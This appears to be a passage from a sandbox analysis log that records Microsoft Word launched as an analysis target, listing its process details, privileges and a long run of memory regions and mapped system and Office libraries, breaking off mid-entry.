# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 11.08.2022 17:01:57.794 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files (x86)\\microsoft office\\office16\\winword.exe" page_root = "0x7cfff000" os_pid = "0x1208" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7b4" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 259 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 260 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 261 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 262 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 263 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 264 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 265 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 266 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 267 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 268 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 269 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 270 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 271 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 272 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 273 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 274 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 275 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 276 start_va = 0x560000 end_va = 0x561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 277 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 278 start_va = 0x580000 end_va = 0x63dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 279 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 280 start_va = 0x740000 end_va = 0x8c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 281 start_va = 0x8d0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 282 start_va = 0x8e0000 end_va = 0x8e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 283 start_va = 0x8f0000 end_va = 0x8f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 284 start_va = 0x900000 end_va = 0x901fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 285 start_va = 0x910000 end_va = 0x911fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 286 start_va = 0x920000 end_va = 0x921fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 287 start_va = 0x930000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 288 start_va = 0x940000 end_va = 0xac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 289 start_va = 0xad0000 end_va = 0xad3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 290 start_va = 0xae0000 end_va = 0xae1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 291 start_va = 0xaf0000 end_va = 0xb98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\1033\\wwintl.dll") Region: id = 292 start_va = 0xba0000 end_va = 0xba4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 293 start_va = 0xbb0000 end_va = 0xbbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 294 start_va = 0xbc0000 end_va = 0xbcefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 295 start_va = 0xbd0000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 296 start_va = 0xbe0000 end_va = 0xbe3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 297 start_va = 0xc00000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 298 start_va = 0xc40000 end_va = 0xe17fff monitored = 0 entry_point = 0xc41000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\winword.exe") Region: id = 299 start_va = 0xe20000 end_va = 0x221ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 300 start_va = 0x2220000 end_va = 0x23d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 301 start_va = 0x23e0000 end_va = 0x2554fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 302 start_va = 0x2570000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 303 start_va = 0x2580000 end_va = 0x2887fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso40uires.dll") Region: id = 304 start_va = 0x2890000 end_va = 0x31b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso99lres.dll") Region: id = 305 start_va = 0x31c0000 end_va = 0x7ffefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\msores.dll") Region: id = 306 start_va = 0x8000000 end_va = 0x803ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008000000" filename = "" Region: id = 307 start_va = 0x80a0000 end_va = 0x80a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000080a0000" filename = "" Region: id = 308 start_va = 0x80b0000 end_va = 0x80b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000080b0000" filename = "" Region: id = 309 start_va = 0x80c0000 end_va = 0x81bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000080c0000" filename = "" Region: id = 310 start_va = 0x8280000 end_va = 0x85b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 311 start_va = 0x85c0000 end_va = 0x85fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085c0000" filename = "" Region: id = 312 start_va = 0x8600000 end_va = 0x86fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008600000" filename = "" Region: id = 313 start_va = 0x8700000 end_va = 0x872dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008700000" filename = "" Region: id = 314 start_va = 0x8730000 end_va = 0x8730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008730000" filename = "" Region: id = 315 start_va = 0x8740000 end_va = 0x877ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008740000" filename = "" Region: id = 316 start_va = 0x8780000 end_va = 0x887ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008780000" filename = "" Region: id = 317 start_va = 0x8880000 end_va = 0x897ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008880000" filename = "" Region: id = 318 start_va = 0x8980000 end_va = 0x8980fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008980000" filename = "" Region: id = 319 start_va = 0x8990000 end_va = 0x8990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008990000" filename = "" Region: id = 320 start_va = 0x89a0000 end_va = 0x89dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089a0000" filename = "" Region: id = 321 start_va = 0x89e0000 end_va = 0x8adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089e0000" filename = "" Region: id = 322 start_va = 0x8ae0000 end_va = 0x8b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ae0000" filename = "" Region: id = 323 start_va = 0x8b20000 end_va = 0x8c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b20000" filename = "" Region: id = 324 start_va = 0x8c20000 end_va = 0x8c68fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 325 start_va = 0x8c70000 end_va = 0x8d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c70000" filename = "" Region: id = 326 start_va = 0x8d70000 end_va = 0x956ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 327 start_va = 0x9570000 end_va = 0x996ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009570000" filename = "" Region: id = 328 start_va = 0x9970000 end_va = 0x9a2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009970000" filename = "" Region: id = 329 start_va = 0x9a30000 end_va = 0x9a33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009a30000" filename = "" Region: id = 330 start_va = 0x9a40000 end_va = 0x9f31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009a40000" filename = "" Region: id = 331 start_va = 0x9f40000 end_va = 0x9f40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f40000" filename = "" Region: id = 332 start_va = 0x9f50000 end_va = 0x9f50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f50000" filename = "" Region: id = 333 start_va = 0x9f60000 end_va = 0x9f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f60000" filename = "" Region: id = 334 start_va = 0x9fa0000 end_va = 0xa09ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fa0000" filename = "" Region: id = 335 start_va = 0xa0a0000 end_va = 0xa0a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a0a0000" filename = "" Region: id = 336 start_va = 0xa0b0000 end_va = 0xa0effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0b0000" filename = "" Region: id = 337 start_va = 0xa0f0000 end_va = 0xa1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0f0000" filename = "" Region: id = 338 start_va = 0xa1f0000 end_va = 0xa1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1f0000" filename = "" Region: id = 339 start_va = 0xa200000 end_va = 0xa23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a200000" filename = "" Region: id = 340 start_va = 0xa240000 end_va = 0xa243fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a240000" filename = "" Region: id = 341 start_va = 0xa250000 end_va = 0xa250fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a250000" filename = "" Region: id = 342 start_va = 0xa260000 end_va = 0xa260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a260000" filename = "" Region: id = 343 start_va = 0xa270000 end_va = 0xa274fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 344 start_va = 0xa280000 end_va = 0xa28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a280000" filename = "" Region: id = 345 start_va = 0xa290000 end_va = 0xa38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a290000" filename = "" Region: id = 346 start_va = 0xa390000 end_va = 0xa3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a390000" filename = "" Region: id = 347 start_va = 0xa3d0000 end_va = 0xa4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a3d0000" filename = "" Region: id = 348 start_va = 0xa4d0000 end_va = 0xa4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a4d0000" filename = "" Region: id = 349 start_va = 0xa4e0000 end_va = 0xa4e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\SysWOW64\\msxml6r.dll" (normalized: "c:\\windows\\syswow64\\msxml6r.dll") Region: id = 350 start_va = 0xa4f0000 end_va = 0xa4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a4f0000" filename = "" Region: id = 351 start_va = 0xa500000 end_va = 0xacfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a500000" filename = "" Region: id = 352 start_va = 0xad00000 end_va = 0xad3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ad00000" filename = "" Region: id = 353 start_va = 0xad40000 end_va = 0xae3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ad40000" filename = "" Region: id = 354 start_va = 0xae40000 end_va = 0xae7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae40000" filename = "" Region: id = 355 start_va = 0xae80000 end_va = 0xaf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae80000" filename = "" Region: id = 356 start_va = 0xaf80000 end_va = 0xafbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af80000" filename = "" Region: id = 357 start_va = 0xafc0000 end_va = 0xb0bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afc0000" filename = "" Region: id = 358 start_va = 0xb0c0000 end_va = 0xb0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0c0000" filename = "" Region: id = 359 start_va = 0xb100000 end_va = 0xb1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b100000" filename = "" Region: id = 360 start_va = 0xb200000 end_va = 0xb3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b200000" filename = "" Region: id = 361 start_va = 0xb400000 end_va = 0xb47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b400000" filename = "" Region: id = 362 start_va = 0xb480000 end_va = 0xb493fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 363 start_va = 0xb4a0000 end_va = 0xb4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b4a0000" filename = "" Region: id = 364 start_va = 0xb4b0000 end_va = 0xb58ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 365 start_va = 0xb590000 end_va = 0xb593fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b590000" filename = "" Region: id = 366 start_va = 0xb5a0000 end_va = 0xb5a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b5a0000" filename = "" Region: id = 367 start_va = 0xb5b0000 end_va = 0xb5b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5b0000" filename = "" Region: id = 368 start_va = 0xb5c0000 end_va = 0xb69efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 369 start_va = 0xb6a0000 end_va = 0xb6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6a0000" filename = "" Region: id = 370 start_va = 0xb7f0000 end_va = 0xc7effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 371 start_va = 0xc7f0000 end_va = 0xcbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c7f0000" filename = "" Region: id = 372 start_va = 0xcbf0000 end_va = 0xcc31fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "d2d1.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\d2d1.dll.mui") Region: id = 373 start_va = 0xcc40000 end_va = 0xcc41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc40000" filename = "" Region: id = 374 start_va = 0xcc50000 end_va = 0xcd25fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc50000" filename = "" Region: id = 375 start_va = 0xcd30000 end_va = 0xce05fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd30000" filename = "" Region: id = 376 start_va = 0xce10000 end_va = 0xce2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce10000" filename = "" Region: id = 377 start_va = 0xce30000 end_va = 0xce4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce30000" filename = "" Region: id = 378 start_va = 0xd130000 end_va = 0xd13ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d130000" filename = "" Region: id = 379 start_va = 0xd140000 end_va = 0xd14ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d140000" filename = "" Region: id = 380 start_va = 0xd150000 end_va = 0xd15ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d150000" filename = "" Region: id = 381 start_va = 0xd160000 end_va = 0xd570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d160000" filename = "" Region: id = 382 start_va = 0xd580000 end_va = 0xd988fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d580000" filename = "" Region: id = 383 start_va = 0xd990000 end_va = 0xdd9afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d990000" filename = "" Region: id = 384 start_va = 0xddb0000 end_va = 0xde2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ddb0000" filename = "" Region: id = 385 start_va = 0xde30000 end_va = 0xde40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 386 start_va = 0xde50000 end_va = 0xee8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 387 start_va = 0xee90000 end_va = 0xf36dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ee90000" filename = "" Region: id = 388 start_va = 0x34400000 end_va = 0x3440ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034400000" filename = "" Region: id = 389 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 390 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 391 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 392 start_va = 0x693b0000 end_va = 0x693d2fff monitored = 0 entry_point = 0x693c69b0 region_type = mapped_file name = "globinputhost.dll" filename = "\\Windows\\SysWOW64\\globinputhost.dll" (normalized: "c:\\windows\\syswow64\\globinputhost.dll") Region: id = 393 start_va = 0x693e0000 end_va = 0x69431fff monitored = 0 entry_point = 0x69408290 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\SysWOW64\\BCP47Langs.dll" (normalized: "c:\\windows\\syswow64\\bcp47langs.dll") Region: id = 394 start_va = 0x69440000 end_va = 0x69571fff monitored = 0 entry_point = 0x694abf60 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\SysWOW64\\Windows.Globalization.dll" (normalized: "c:\\windows\\syswow64\\windows.globalization.dll") Region: id = 395 start_va = 0x69580000 end_va = 0x69595fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 396 start_va = 0x69850000 end_va = 0x69870fff monitored = 0 entry_point = 0x6985bdb0 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 397 start_va = 0x69880000 end_va = 0x6a074fff monitored = 0 entry_point = 0x698e5279 region_type = mapped_file name = "chart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\CHART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\chart.dll") Region: id = 398 start_va = 0x6a080000 end_va = 0x6a112fff monitored = 0 entry_point = 0x6a0a0ec0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\SysWOW64\\twinapi.dll" (normalized: "c:\\windows\\syswow64\\twinapi.dll") Region: id = 399 start_va = 0x6a120000 end_va = 0x6a186fff monitored = 0 entry_point = 0x6a135a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 400 start_va = 0x6a190000 end_va = 0x6a198fff monitored = 0 entry_point = 0x6a193830 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 401 start_va = 0x6a1a0000 end_va = 0x6a1d3fff monitored = 0 entry_point = 0x6a1b8280 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 402 start_va = 0x6a1e0000 end_va = 0x6a381fff monitored = 0 entry_point = 0x6a1e1000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\riched20.dll") Region: id = 403 start_va = 0x6a390000 end_va = 0x6a397fff monitored = 0 entry_point = 0x6a3917b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 404 start_va = 0x6a3a0000 end_va = 0x6a41cfff monitored = 0 entry_point = 0x6a3b0db0 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 405 start_va = 0x6a420000 end_va = 0x6a478fff monitored = 0 entry_point = 0x6a430780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 406 start_va = 0x6a480000 end_va = 0x6a5f2fff monitored = 0 entry_point = 0x6a52d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 407 start_va = 0x6a600000 end_va = 0x6a65bfff monitored = 0 entry_point = 0x6a608880 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\SysWOW64\\d3d10_1core.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1core.dll") Region: id = 408 start_va = 0x6a660000 end_va = 0x6a68bfff monitored = 0 entry_point = 0x6a6824b0 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\SysWOW64\\d3d10_1.dll" (normalized: 